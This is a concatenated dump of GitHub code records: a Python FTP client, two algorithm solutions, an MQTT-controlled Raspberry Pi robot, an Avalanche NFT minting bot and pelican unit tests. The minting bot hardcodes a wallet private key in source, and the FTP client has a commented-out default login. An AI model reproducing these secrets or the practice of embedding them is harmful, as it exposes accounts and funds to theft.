self.auth():\n # self.interactive()\n\n def connect(self):\n #连接\n self.sock.connect((self.ip_port))\n def auth(self,message):\n #认证\n msg_dct = {\n \"action\": \"ftp_auth\"\n }\n #msg_dct[\"msg\"] = [\"auth\", \"admin\", \"123456\"]\n msg_dct[\"msg\"] = message\n # 第一次发送操作文件信息\n send_msg = self.format_msg(msg_dct)\n self.sock.send(send_msg)\n server_response = self.sock.recv(1024)\n server_dct = server_response.decode(\"utf-8\")\n response_list = json.loads(server_dct)\n msg_type = response_list.split('::')[0]\n msg_result = response_list.split('::')[1]\n if msg_type == 'auth' and msg_result == 'success':\n return True\n elif msg_type == 'auth' and msg_result == 'failed':\n print('认证失败%s' % msg_result)\n return False\n else:\n print('接受信息错误!请联系管理员')\n\n def start(self,message):\n self.auth_result = False\n #开始,认证用户,保存用户登录信息和目录信息到\n self.connect()\n print('欢迎%s使用ftp'%self.name)\n #print(message)\n self.auth_result = self.auth(message)\n while self.auth_result:\n return True\n def cd(self):\n self.cmd_send('ls')\n # 接收文件状态,是否改变成功\n server_response = self.sock.recv(1024)\n if server_response:\n server_dct = self.loads_msg(server_response)\n cur_dir = server_dct['list']['root']\n while True:\n print('当前目录%s' % cur_dir)\n selected_path = input('请输入切换的目录名')\n if selected_path == 'q' or selected_path == 'Q':\n return False\n if selected_path in server_dct['list']['dirs'] or selected_path == '~' or selected_path == '..':\n self.cmd_send(\"cd\", \"cd::\" + selected_path)\n server_response = self.sock.recv(1024)\n if 
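# --- Editor's illustrative sketch (not part of the record above) ---
# The districtOPRs loop above hand-rolls a cache: check eventData first, call
# the API only on a miss, then store the result. The same idea as a tiny
# helper (fetch stands in for tba.event_oprs):

def cached(cache, key, fetch):
    if key not in cache:
        cache[key] = fetch(key)  # only hit the API on a cache miss
    return cache[key]

calls = []
data = {}
fake_fetch = lambda k: (calls.append(k) or {'oprs': {}})
cached(data, '2018event', fake_fetch)
cached(data, '2018event', fake_fetch)
assert calls == ['2018event']  # second lookup served from the cache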
server_response:\n server_dct = self.loads_msg(server_response)\n server_dct = server_dct.split('::')\n if server_dct[1] == 'success' and server_dct[0] == 'cd':\n print('切换目录成功')\n return True\n else:\n print('无效的路径,请重试')\n def pwd(self):\n #显示当前路径\n self.cmd_send('ls')\n # 接收文件状态,是否改变成功\n server_response = self.sock.recv(1024)\n if server_response:\n server_dct = self.loads_msg(server_response)\n cur_dir = server_dct['list']['root']\n print('当前目录%s' % cur_dir)\n\n def put(self, *args):\n \"\"\"客户端,发送文件,已测试可以单个文件上传\"\"\"\n cmd_split = args[0].split(\" \")\n if len(cmd_split)>0:\n file_fullname = cmd_split[0]\n # 判断文件是否存在,存在则继续\n if os.path.isfile(file_fullname):\n size = os.stat(file_fullname).st_size # 获取文件大小\n msg_dct = {\n \"filename\": os.path.basename(file_fullname),\n \"size\": size,\n \"override\": True\n }\n send_len = 0\n # 第一次发送操作文件信息\n self.cmd_send('put',msg_dct)\n # 确认接收,防止粘包,确认服务器空间是否足够\n server_response = self.sock.recv(1024)\n server_response = self.loads_msg(server_response)\n if server_response['status'] == \"continue\" :\n print(\"空间足够\")\n if server_response['breakout']:\n print('存在文件断点%s,正在续传...' % server_response['breakout'])\n # 接着发送文件内容\n m = hashlib.md5()\n break_size = server_response['breakout']\n send_len = break_size\n elif server_response['status'] == \"OK\" :\n pass\n elif server_response['status'] == \"rename\":\n print('检测到重名文件,自动重新命名')\n else:\n print(\"空间不足\")\n return # 中断操作\n\n # 接着发送文件内容\n m = hashlib.md5()\n f = open(file_fullname, \"rb\")\n if server_response['breakout']:\n f.seek(break_size, 0)\n print(f.tell())\n for line in f:\n self.sock.send(line)\n m.update(line)\n send_len += len(line)\n #经过测试,进度条在pycharm里不会显示,在控制台里显示良好。\n percent = int(round(send_len/size, 2)*100)\n progress_mark = \"=\" * int(percent / 2)\n print(\"[%s/%s]%s>%s\" % (size, send_len, progress_mark, percent),end= '\\r')\n sys.stdout.flush()\n if send_len >= size:\n print('文件读取完毕')\n f.close()\n\n # 可以增加MD5校验\n self.sock.send(m.hexdigest().encode(\"utf-8\"))\n res = self.sock.recv(1024).decode(\"utf-8\")\n if res ==\"0\" and server_response['status'] == \"OK\":\n print(\"文件传输成功,剩余空间%s\"%server_response['size'])\n elif server_response['status'] == \"rename\":\n print(\"文件传输成功,重命名为new_%s\" % msg_dct['filename'])\n else:\n print(\"文件传输失败\")\n else:\n print(\"文件不存在 %s\" % file_fullname)\n def get(self,*args):\n #客户端请求下载\n try:\n cmd_split = args[0].split(\" \")\n if len(cmd_split) > 0:#参数正确则继续\n file_name = cmd_split[0]\n msg_dct = {\n \"filename\": file_name,\n \"LocalPath\": \"D:\\\\\"\n }\n # 第一次发送操作文件信息\n self.cmd_send('get', msg_dct)#发送get请求握手\n res = self.sock.recv(1024)\n decode_res = self.loads_msg(res)\n decode_res_cmd = decode_res.split(\"::\")[0]\n decode_res_result = decode_res.split(\"::\")[1]\n decode_res_filesize = int(decode_res.split(\"::\")[2])#文件大小\n if decode_res_cmd == 'get' and decode_res_result == 'READY':\n #握手确认文件存在,下一步进入传输阶段\n file_fullname = os.path.join(msg_dct['LocalPath'],file_name)\n f = open(file_fullname, \"wb\")\n received_size = 0\n m = hashlib.md5()\n while received_size < decode_res_filesize:\n if decode_res_filesize - received_size > 1024:\n size = 1024\n else:\n size = decode_res_filesize - received_size\n data = self.sock.recv(size)#接收文件\n f.write(data)\n m.update(data)\n received_size += len(data)\n else:\n f.close()\n received_md5 = self.sock.recv(1024).decode(\"utf-8\")#接收文件校验\n if m.hexdigest() == received_md5:\n if os.path.isfile(file_fullname):\n print(\"文件下载成功%s\" %(file_fullname))\n msg = self.format_msg(\"get::success\")\n 
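# --- Editor's illustrative sketch (not part of the record above) ---
# The resume branch in the FTP client above seeks to the server-reported
# breakpoint and hashes only the bytes it actually streams, so the receiving
# side must feed its md5 the same span for the final check to agree. The core
# pattern in isolation (send stands in for sock.send; path and offset are
# hypothetical):

import hashlib

def send_from_offset(path, offset, send):
    digest = hashlib.md5()
    with open(path, 'rb') as f:
        f.seek(offset)  # skip the bytes the server already has
        for block in iter(lambda: f.read(4096), b''):
            send(block)
            digest.update(block)
    return digest.hexdigest()  # checksum of the sent tail only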
self.sock.send(msg)\n else:\n print(\"文件上传出错\")\n msg = self.format_msg(\"get::failed\")\n self.sock.send(msg)\n else:\n print('get参数不正确')\n except Exception as e:\n print(e)\n\n\n def testConn(self):\n msg_dct = {\n \"action\": \"testConn\"\n }\n cmdstr = json.dumps(msg_dct)\n self.sock.send(cmdstr.encode(\"utf-8\"))\n print('???')\n # # 接收文件状态,是否改变成功\n # server_response = self.sock.recv(1024)\n # server_dct = server_response.decode(\"utf-8\")\n #\n # print(server_dct[\"list\"])\n def ls2(self, *args):\n \"\"\"客户端,查看文件目录\"\"\"\n self.cmd_send('ls')\n # 接收文件状态,是否改变成功\n server_response = self.sock.recv(1024)\n if server_response:\n server_dct = self.loads_msg(server_response)\n cur_dir = server_dct['list']['root']\n print('当前目录%s' % cur_dir)\n for key in server_dct['list']['dirs']:\n print('d---------\\t%s' % key)\n for key in server_dct['list']['files']:\n print('f---------\\t%s' % key)\n def format_msg(self,msg):\n return json.dumps(msg).encode(\"utf-8\")\n def loads_msg(self,msg):\n return json.loads(msg.decode(\"utf-8\"))\n\n def cmd_send(self,command,msg=None):\n if self.auth_result:\n msg_dct = {\n \"action\": command,\n \"msg\": msg\n }\n # 第一次发送操作文件信息\n msg = self.format_msg(msg_dct)\n self.sock.send(msg)\n def exit(self):\n #退出\n self.auth_result = False\n self.sock.close()\n# ip_port = (\"127.0.0.1\",9999)\n# c = Myclient(ip_port,'admin')\n# #c.start()\n# c.start([\"auth\",\"admin\",\"123456\"])\n# x = '-l'.encode(\"utf-8\")\n# c.auth()\n# c.sock.close()\n","repo_name":"ddoplayer2012/py","sub_path":"work3/ftp/ftp0223/core/user_clients.py","file_name":"user_clients.py","file_ext":"py","file_size_in_byte":10733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70576402987","text":"def solution(s):\n\n def expand(left: int, right: int) -> str:\n while 0 <= left and right < len(s) and s[left] == s[right]:\n left -= 1\n right += 1\n\n return s[left: right + 1]\n\n if len(s) == 1 or s == s[::-1]:\n return len(s)\n\n result = \"\"\n for i in range(len(s) - 1):\n result = max(result, expand(i, i), expand(i, i+1), key=len)\n\n return len(result)\n\n\nif __name__ == \"__main__\":\n s = \"abcdcba\"\n result = 7\n answer = solution(s)\n print(result == answer, answer)\n","repo_name":"lymchgmk/Algorithm-Problem-Solving","sub_path":"Programmers/연습문제/Level 3/가장 긴 팰린드롬/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73407981547","text":"def solution(m, n, puddles):\n board = [[0] * m for _ in range(n)]\n dy = [-1, 0]\n dx = [0, -1]\n board[0][0] = 1\n for puddle in puddles:\n x, y = puddle\n board[y - 1][x - 1] = -1\n for i in range(n):\n for j in range(m):\n if board[i][j] == -1:\n continue\n for k in range(2):\n yy = i + dy[k]\n xx = j + dx[k]\n if 0 <= yy < n and 0 <= xx < m:\n if board[yy][xx] == -1:\n continue\n board[i][j] += board[yy][xx]\n\n answer = board[-1][-1] % 1000000007\n return answer","repo_name":"lhbbbb/TIL","sub_path":"Algorithm/Programmers/DP/등굣길.py","file_name":"등굣길.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30227431285","text":"import paho.mqtt.client as paho\nimport json\nfrom crontab import CronTab\nimport datetime\nimport threading\nimport RPi.GPIO as GPIO\nimport time\nimport picamera\nfrom datetime import datetime\nimport argparse\n\nap = 
argparse.ArgumentParser()\nap.add_argument(\"-q\", \"--query\", required=True,\n\thelp=\"Query with plant ID's to be read\")\nargs = vars(ap.parse_args())\n\nqr_codes = args[\"query\"].split(\",\")\n\nprint(qr_codes)\n\nis_too_close = False\nobject_was_detected = False\nturn = \"none\"\ntopics = [\"testProximity\", \"objectDetection\", \"barcodeReader\"]\nis_right_plant = False\nfindID = \"\"\nhow_close = 0.0\n\n\n# This is the Subscriber\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n for topic in topics:\n client.subscribe(topic, qos=2)\n\ndef on_message(client, userdata, msg):\n global is_too_close\n global turn\n global object_was_detected\n global is_right_plant\n global findId \n global how_close\n if msg.topic == \"testProximity\":\n distance = float(msg.payload.decode('utf-8'))\n how_close = distance\n if distance < 15.0:\n is_too_close = True\n else:\n is_too_close = False\n elif msg.topic == \"objectDetection\":\n obj_detection = json.loads(msg.payload.decode('utf-8'))\n if obj_detection[\"object\"] == \"plant\" or obj_detection[\"object\"] == \"pottedplant\" or obj_detection[\"object\"] == \"person\":\n object_was_detected = True\n coord1 = int(obj_detection[\"coords\"][0])\n coord2 = int(obj_detection[\"coords\"][1])\n center = (coord1 + coord2) / 2\n print(center)\n if center < 250:\n turn = \"left\"\n elif center > 250:\n turn = \"right\"\n else: \n turn = \"none\"\n elif msg.topic == \"barcodeReader\":\n get_value = msg.payload.decode('utf-8')\n print(get_value)\n global findID \n findID = get_value\n if get_value in qr_codes:\n is_right_plant = True\n \n \nbroker=\"localhost\"\nport=1883\nuser=\"guest\"\npassword=\"guest\"\nclient=paho.Client(\"scheduler\")\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.username_pw_set(user, password=password)\n\n\nGPIO.setmode(GPIO.BCM)\n\nfwdleft = 24\nfwdright = 25\n\nrevleft = 23\nrevright = 27\n\nmotors = [fwdleft,fwdright,revleft,revright]\n\nfor item in motors:\n\tGPIO.setup(item, GPIO.OUT)\n\ndef forward2(i):\n\tGPIO.output(fwdright, True)\n\tGPIO.output(fwdleft, True)\n\ndef right(i):\n\tGPIO.output(revright, True)\n\tGPIO.output(fwdleft, True)\n\ttime.sleep(i)\n\tGPIO.output(revright, False)\n\tGPIO.output(fwdleft, False)\n\ndef left2(i):\n\tGPIO.output(fwdright, True)\n\tGPIO.output(revleft, True)\n\ttime.sleep(i)\n\tGPIO.output(fwdright, False)\n\tGPIO.output(revleft, False)\n\ndef reverse(i):\n\tGPIO.output(revleft, True)\n\tGPIO.output(revright, True)\n\ttime.sleep(i)\n\tGPIO.output(revleft, False)\n\tGPIO.output(revright, False)\n\ndef stop():\n GPIO.output(revleft, False)\n GPIO.output(revright, False)\n GPIO.output(fwdright, False)\n GPIO.output(fwdleft, False)\n\n\ndef subscribing():\n print(\"started thread\")\n client.connect(broker,port)\n while(True):\n client.loop()\n\ndef publish():\n print(\"sending message\")\n print(findID)\n ret= client.publish(\"takePicture\",findID,2)\n\n\nif __name__ == \"__main__\":\n mqtt_subscriber=threading.Thread(target=subscribing)\n mqtt_subscriber.start()\n try:\n print(\"R E A D Y\")\n counter = 0\n while(1):\n if is_too_close:\n if how_close < 15.0:\n stop()\n time.sleep(2)\n if object_was_detected or is_right_plant:\n stop()\n print(\"taking a picture\")\n time.sleep(5)\n object_was_detected = False\n is_right_plant = False\n is_too_close = False\n left2(0.5)\n else:\n counter = 0\n print(\"turning left\")\n left2(0.3)\n is_too_close = False\n else:\n if turn == \"none\":\n forward2(50)\n print(\"going 
forward\")\n elif turn == \"left\":\n left2(0.1)\n print(\"turning left\")\n turn = \"none\"\n elif turn == \"right\":\n print(\"turning right\")\n right(0.1)\n turn = \"none\"\n\n except KeyboardInterrupt:\n print(\"E X I T\")\n GPIO.cleanup()\n mqtt_subscriber.terminate()\n","repo_name":"carolinepetrova/iPlant","sub_path":"iPlant_Robot_Source/car_controls.py","file_name":"car_controls.py","file_ext":"py","file_size_in_byte":4646,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"18314475835","text":"# !/usr/bin/python\nimport time\n\nfrom eth_account import Account\nfrom web3 import Web3\nfrom web3.middleware import geth_poa_middleware\nfrom web3.types import TxParams\n\nfrom flatlaunchpeg import FLATLAUNCHPEG_ABI\n\n\n# See the README.md for more information.\n\ndef main():\n print('Loading')\n\n # Settings for the mint. I've put in examples so you know what should go in here.\n # Make sure you replace the contract address and private key!\n # What NFT are you minting?\n contract_address = '0x048c939bEa33c5dF4d2C69414B9385d55b3bA62E'\n # Your private key; use a special-purpose low asset account.\n private_key = '0xf964f5e1d7acf7265dfec7cd70821324786a2271e4bddf6a3d3630e45ee1015c'\n # This should be enough gas, but you might have to boost it if you're minting a lot of NFTs at one time.\n gas_limit = 300_000\n # This is the 'max' gas; you will only actually pay whatever the block fee ends up being.\n max_gas_in_gwei = 50\n # This is a tip; higher tips get placed earlier in the block.\n gas_tip_in_gwei = 2\n\n # Load the account, connect to Avalanche, and prepare the mint contract proxy.\n account = Account.from_key(private_key)\n node_uri = 'https://api.avax.network/ext/bc/C/rpc'\n w3 = Web3(Web3.HTTPProvider(node_uri))\n w3.middleware_onion.inject(geth_poa_middleware, layer=0)\n mint_contract = w3.eth.contract(address=Web3.toChecksumAddress(contract_address), abi=FLATLAUNCHPEG_ABI)\n\n # Load some stuff from the contract. 
You could hardcode these values instead.\n start_time = mint_contract.functions.publicSaleStartTime().call()\n price = mint_contract.functions.salePrice().call()\n quantity = mint_contract.functions.maxPerAddressDuringMint().call()\n print('Detected Configuration:')\n print(' start_time:', start_time)\n print(' price:', price)\n print(' quantity:', quantity)\n print('Cur time:', int(time.time()))\n\n # Loop until the mint is ready.\n while time.time() - start_time < 0:\n time.sleep(.1)\n\n # Create the basic transaction that we're going to send.\n base_tx: TxParams = {\n 'type': 0x2,\n 'chainId': w3.eth.chain_id,\n 'gas': gas_limit,\n 'maxFeePerGas': Web3.toWei(max_gas_in_gwei, 'gwei'),\n 'maxPriorityFeePerGas': Web3.toWei(gas_tip_in_gwei, 'gwei'),\n 'nonce': w3.eth.get_transaction_count(account.address),\n 'value': price * quantity,\n }\n\n # Create the appropriate 'data' field and append it to the tx.\n contract_function = mint_contract.functions.publicSaleMint(quantity)\n contract_tx = contract_function.buildTransaction(base_tx)\n\n # Sign it, and send it.\n signed_tx = w3.eth.account.sign_transaction(contract_tx, account.privateKey)\n tx_hash = w3.eth.send_raw_transaction(signed_tx.rawTransaction)\n\n # Wait for the tx to be included into the blockchain.\n hex_hash = w3.toHex(tx_hash)\n receipt = w3.eth.wait_for_transaction_receipt(hex_hash)\n\n # Dump the finalized tx to the console.\n print('Done!')\n print(receipt)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tactical-retreat/nft-bot-public","sub_path":"python/simple_bot.py","file_name":"simple_bot.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"36456392760","text":"import locale\nimport logging\nimport os\nimport shutil\nfrom datetime import timezone\nfrom sys import platform\nfrom tempfile import mkdtemp\n\ntry:\n from zoneinfo import ZoneInfo\nexcept ModuleNotFoundError:\n from backports.zoneinfo import ZoneInfo\n\nfrom pelican import utils\nfrom pelican.generators import TemplatePagesGenerator\nfrom pelican.settings import read_settings\nfrom pelican.tests.support import (\n LoggedTestCase,\n get_article,\n locale_available,\n unittest,\n)\nfrom pelican.writers import Writer\n\n\nclass TestUtils(LoggedTestCase):\n _new_attribute = \"new_value\"\n\n def setUp(self):\n super().setUp()\n self.temp_output = mkdtemp(prefix=\"pelicantests.\")\n\n def tearDown(self):\n super().tearDown()\n shutil.rmtree(self.temp_output)\n\n @utils.deprecated_attribute(\n old=\"_old_attribute\", new=\"_new_attribute\", since=(3, 1, 0), remove=(4, 1, 3)\n )\n def _old_attribute():\n return None\n\n def test_deprecated_attribute(self):\n value = self._old_attribute\n self.assertEqual(value, self._new_attribute)\n self.assertLogCountEqual(\n count=1,\n msg=(\n \"_old_attribute has been deprecated since 3.1.0 and will be \"\n \"removed by version 4.1.3. 
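# --- Editor's illustrative sketch (not part of the record above) ---
# The fee comments in the mint-bot record above describe EIP-1559 (type 0x2)
# pricing: maxFeePerGas is only a cap, and the transaction actually pays the
# block's base fee plus the tip, clipped to that cap:

def effective_gas_price(base_fee, max_fee, max_priority_fee):
    return min(max_fee, base_fee + max_priority_fee)

# 25 gwei base fee, 50 gwei cap, 2 gwei tip -> pays 27 gwei, not 50
assert effective_gas_price(25, 50, 2) == 27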
Use _new_attribute instead\"\n ),\n level=logging.WARNING,\n )\n\n def test_get_date(self):\n # valid ones\n date = utils.SafeDatetime(year=2012, month=11, day=22)\n date_hour = utils.SafeDatetime(year=2012, month=11, day=22, hour=22, minute=11)\n date_hour_z = utils.SafeDatetime(\n year=2012, month=11, day=22, hour=22, minute=11, tzinfo=timezone.utc\n )\n date_hour_est = utils.SafeDatetime(\n year=2012, month=11, day=22, hour=22, minute=11, tzinfo=ZoneInfo(\"EST\")\n )\n date_hour_sec = utils.SafeDatetime(\n year=2012, month=11, day=22, hour=22, minute=11, second=10\n )\n date_hour_sec_z = utils.SafeDatetime(\n year=2012,\n month=11,\n day=22,\n hour=22,\n minute=11,\n second=10,\n tzinfo=timezone.utc,\n )\n date_hour_sec_est = utils.SafeDatetime(\n year=2012,\n month=11,\n day=22,\n hour=22,\n minute=11,\n second=10,\n tzinfo=ZoneInfo(\"EST\"),\n )\n date_hour_sec_frac_z = utils.SafeDatetime(\n year=2012,\n month=11,\n day=22,\n hour=22,\n minute=11,\n second=10,\n microsecond=123000,\n tzinfo=timezone.utc,\n )\n dates = {\n \"2012-11-22\": date,\n \"2012/11/22\": date,\n \"2012-11-22 22:11\": date_hour,\n \"2012/11/22 22:11\": date_hour,\n \"22-11-2012\": date,\n \"22/11/2012\": date,\n \"22.11.2012\": date,\n \"22.11.2012 22:11\": date_hour,\n \"2012-11-22T22:11Z\": date_hour_z,\n \"2012-11-22T22:11-0500\": date_hour_est,\n \"2012-11-22 22:11:10\": date_hour_sec,\n \"2012-11-22T22:11:10Z\": date_hour_sec_z,\n \"2012-11-22T22:11:10-0500\": date_hour_sec_est,\n \"2012-11-22T22:11:10.123Z\": date_hour_sec_frac_z,\n }\n\n # examples from http://www.w3.org/TR/NOTE-datetime\n iso_8601_date = utils.SafeDatetime(year=1997, month=7, day=16)\n iso_8601_date_hour_tz = utils.SafeDatetime(\n year=1997,\n month=7,\n day=16,\n hour=19,\n minute=20,\n tzinfo=ZoneInfo(\"Europe/London\"),\n )\n iso_8601_date_hour_sec_tz = utils.SafeDatetime(\n year=1997,\n month=7,\n day=16,\n hour=19,\n minute=20,\n second=30,\n tzinfo=ZoneInfo(\"Europe/London\"),\n )\n iso_8601_date_hour_sec_ms_tz = utils.SafeDatetime(\n year=1997,\n month=7,\n day=16,\n hour=19,\n minute=20,\n second=30,\n microsecond=450000,\n tzinfo=ZoneInfo(\"Europe/London\"),\n )\n iso_8601 = {\n \"1997-07-16\": iso_8601_date,\n \"1997-07-16T19:20+01:00\": iso_8601_date_hour_tz,\n \"1997-07-16T19:20:30+01:00\": iso_8601_date_hour_sec_tz,\n \"1997-07-16T19:20:30.45+01:00\": iso_8601_date_hour_sec_ms_tz,\n }\n\n # invalid ones\n invalid_dates = [\"2010-110-12\", \"yay\"]\n\n for value, expected in dates.items():\n self.assertEqual(utils.get_date(value), expected, value)\n\n for value, expected in iso_8601.items():\n self.assertEqual(utils.get_date(value), expected, value)\n\n for item in invalid_dates:\n self.assertRaises(ValueError, utils.get_date, item)\n\n def test_slugify(self):\n samples = (\n (\"this is a test\", \"this-is-a-test\"),\n (\"this is a test\", \"this-is-a-test\"),\n (\"this → is ← a ↑ test\", \"this-is-a-test\"),\n (\"this--is---a test\", \"this-is-a-test\"),\n (\n \"unicode測試許功蓋,你看到了嗎?\",\n \"unicodece-shi-xu-gong-gai-ni-kan-dao-liao-ma\",\n ),\n (\n \"大飯原発4号機、18日夜起動へ\",\n \"da-fan-yuan-fa-4hao-ji-18ri-ye-qi-dong-he\",\n ),\n )\n\n settings = read_settings()\n subs = settings[\"SLUG_REGEX_SUBSTITUTIONS\"]\n\n for value, expected in samples:\n self.assertEqual(utils.slugify(value, regex_subs=subs), expected)\n\n self.assertEqual(utils.slugify(\"Cat\", regex_subs=subs), \"cat\")\n self.assertEqual(\n utils.slugify(\"Cat\", regex_subs=subs, preserve_case=False), \"cat\"\n )\n self.assertEqual(\n utils.slugify(\"Cat\", 
regex_subs=subs, preserve_case=True), \"Cat\"\n )\n\n def test_slugify_use_unicode(self):\n samples = (\n (\"this is a test\", \"this-is-a-test\"),\n (\"this is a test\", \"this-is-a-test\"),\n (\"this → is ← a ↑ test\", \"this-is-a-test\"),\n (\"this--is---a test\", \"this-is-a-test\"),\n (\"unicode測試許功蓋,你看到了嗎?\", \"unicode測試許功蓋你看到了嗎\"),\n (\"Çığ\", \"çığ\"),\n )\n\n settings = read_settings()\n subs = settings[\"SLUG_REGEX_SUBSTITUTIONS\"]\n\n for value, expected in samples:\n self.assertEqual(\n utils.slugify(value, regex_subs=subs, use_unicode=True), expected\n )\n\n # check with preserve case\n for value, expected in samples:\n self.assertEqual(\n utils.slugify(\n \"Çığ\", regex_subs=subs, preserve_case=True, use_unicode=True\n ),\n \"Çığ\",\n )\n\n # check normalization\n samples = (\n (\"大飯原発4号機、18日夜起動へ\", \"大飯原発4号機18日夜起動へ\"),\n (\n \"\\N{LATIN SMALL LETTER C}\\N{COMBINING CEDILLA}\",\n \"\\N{LATIN SMALL LETTER C WITH CEDILLA}\",\n ),\n )\n for value, expected in samples:\n self.assertEqual(\n utils.slugify(value, regex_subs=subs, use_unicode=True), expected\n )\n\n def test_slugify_substitute(self):\n samples = (\n (\"C++ is based on C\", \"cpp-is-based-on-c\"),\n (\"C+++ test C+ test\", \"cpp-test-c-test\"),\n (\"c++, c#, C#, C++\", \"cpp-c-sharp-c-sharp-cpp\"),\n (\"c++-streams\", \"cpp-streams\"),\n )\n\n settings = read_settings()\n subs = [\n (r\"C\\+\\+\", \"CPP\"),\n (r\"C#\", \"C-SHARP\"),\n ] + settings[\"SLUG_REGEX_SUBSTITUTIONS\"]\n for value, expected in samples:\n self.assertEqual(utils.slugify(value, regex_subs=subs), expected)\n\n def test_slugify_substitute_and_keeping_non_alphanum(self):\n samples = (\n (\"Fedora QA\", \"fedora.qa\"),\n (\"C++ is used by Fedora QA\", \"cpp is used by fedora.qa\"),\n (\"C++ is based on C\", \"cpp is based on c\"),\n (\"C+++ test C+ test\", \"cpp+ test c+ test\"),\n )\n\n subs = [\n (r\"Fedora QA\", \"fedora.qa\"),\n (r\"c\\+\\+\", \"cpp\"),\n ]\n for value, expected in samples:\n self.assertEqual(utils.slugify(value, regex_subs=subs), expected)\n\n def test_get_relative_path(self):\n samples = (\n (os.path.join(\"test\", \"test.html\"), os.pardir),\n (\n os.path.join(\"test\", \"test\", \"test.html\"),\n os.path.join(os.pardir, os.pardir),\n ),\n (\"test.html\", os.curdir),\n (os.path.join(\"/test\", \"test.html\"), os.pardir),\n (\n os.path.join(\"/test\", \"test\", \"test.html\"),\n os.path.join(os.pardir, os.pardir),\n ),\n (\"/test.html\", os.curdir),\n )\n\n for value, expected in samples:\n self.assertEqual(utils.get_relative_path(value), expected)\n\n def test_truncate_html_words(self):\n # Plain text.\n self.assertEqual(utils.truncate_html_words(\"short string\", 20), \"short string\")\n self.assertEqual(\n utils.truncate_html_words(\"word \" * 100, 20), \"word \" * 20 + \"…\"\n )\n\n # Plain text with Unicode content.\n self.assertEqual(\n utils.truncate_html_words(\n \"我愿意这样,朋友——我独自远行,不但没有你,\\\n 并且再没有别的影在黑暗里。\",\n 12,\n ),\n \"我愿意这样,朋友——我独自远行\" + \" …\",\n )\n self.assertEqual(\n utils.truncate_html_words(\n \"Ты мелькнула, ты предстала, Снова сердце задрожало,\", 3\n ),\n \"Ты мелькнула, ты\" + \" …\",\n )\n self.assertEqual(\n utils.truncate_html_words(\"Trong đầm gì đẹp bằng sen\", 4),\n \"Trong đầm gì đẹp\" + \" …\",\n )\n\n # Words enclosed or intervaled by HTML tags.\n self.assertEqual(\n utils.truncate_html_words(\"
<p>\" + \"word \" * 100 + \"</p>\", 20),\n \"<p>\" + \"word \" * 20 + \"…</p>\",\n )\n self.assertEqual(\n utils.truncate_html_words(\n '<span\\nstyle=\"i am a span\">' + \"word \" * 100 + \"</span>\", 20\n ),\n '<span\\nstyle=\"i am a span\">' + \"word \" * 20 + \"…</span>\",\n )\n self.assertEqual(\n utils.truncate_html_words(\"<br>\" + \"word \" * 100, 20),\n \"<br>\" + \"word \" * 20 + \"…\",\n )\n self.assertEqual(\n utils.truncate_html_words(\"<hr />\" + \"word \" * 100, 20),\n \"<hr />\" + \"word \" * 20 + \"…\",\n )\n\n # Words enclosed or intervaled by HTML tags with a custom end\n # marker containing HTML tags.\n self.assertEqual(\n utils.truncate_html_words(\n \"<p>\" + \"word \" * 100 + \"</p>\", 20, \"<span>marker</span>\"\n ),\n \"<p>\" + \"word \" * 20 + \"<span>marker</span></p>\",\n )\n self.assertEqual(\n utils.truncate_html_words(\n '<span\\nstyle=\"i am a span\">' + \"word \" * 100 + \"</span>\",\n 20,\n \"<span>marker</span>\",\n ),\n '<span\\nstyle=\"i am a span\">' + \"word \" * 20 + \"<span>marker</span></span>\",\n )\n self.assertEqual(\n utils.truncate_html_words(\n \"<br>\" + \"word \" * 100, 20, \"<span>marker</span>\"\n ),\n \"<br>\" + \"word \" * 20 + \"<span>marker</span>\",\n )\n self.assertEqual(\n utils.truncate_html_words(\n \"<hr />\" + \"word \" * 100, 20, \"<span>marker</span>\"\n ),\n \"<hr />\" + \"word \" * 20 + \"<span>marker</span>\",\n )\n\n # Words with hyphens and apostrophes.\n self.assertEqual(utils.truncate_html_words(\"a-b \" * 100, 20), \"a-b \" * 20 + \"…\")\n self.assertEqual(\n utils.truncate_html_words(\"it's \" * 100, 20), \"it's \" * 20 + \"…\"\n )\n\n # Words with HTML entity references.\n self.assertEqual(\n utils.truncate_html_words(\"&eacute; \" * 100, 20), \"&eacute; \" * 20 + \"…\"\n )\n self.assertEqual(\n utils.truncate_html_words(\"caf&eacute; \" * 100, 20),\n \"caf&eacute; \" * 20 + \"…\",\n )\n self.assertEqual(\n utils.truncate_html_words(\"&egrave;lite \" * 100, 20),\n \"&egrave;lite \" * 20 + \"…\",\n )\n self.assertEqual(\n utils.truncate_html_words(\"cafeti&eacute;re \" * 100, 20),\n \"cafeti&eacute;re \" * 20 + \"…\",\n )\n self.assertEqual(\n utils.truncate_html_words(\"&int;dx \" * 100, 20), \"&int;dx \" * 20 + \"…\"\n )\n\n # Words with HTML character references inside and outside\n # the ASCII range.\n self.assertEqual(\n utils.truncate_html_words(\"&#233; \" * 100, 20), \"&#233; \" * 20 + \"…\"\n )\n self.assertEqual(\n utils.truncate_html_words(\"&#8747;dx \" * 100, 20), \"&#8747;dx \" * 20 + \"…\"\n )\n\n # Words with invalid or broken HTML references.\n self.assertEqual(utils.truncate_html_words(\"&invalid;\", 20), \"&invalid;\")\n self.assertEqual(\n utils.truncate_html_words(\"&#9999999999;\", 20), \"&#9999999999;\"\n )\n self.assertEqual(\n utils.truncate_html_words(\"&#xfffffffff;\", 20), \"&#xfffffffff;\"\n )\n self.assertEqual(utils.truncate_html_words(\"&mdash text\", 20), \"&mdash text\")\n self.assertEqual(utils.truncate_html_words(\"&#1234 text\", 20), \"&#1234 text\")\n self.assertEqual(utils.truncate_html_words(\"&#xabc text\", 20), \"&#xabc text\")\n\n def test_process_translations(self):\n fr_articles = []\n en_articles = []\n\n # create a bunch of articles\n # 0: no translation metadata\n fr_articles.append(\n get_article(lang=\"fr\", slug=\"yay0\", title=\"Titre\", content=\"en français\")\n )\n 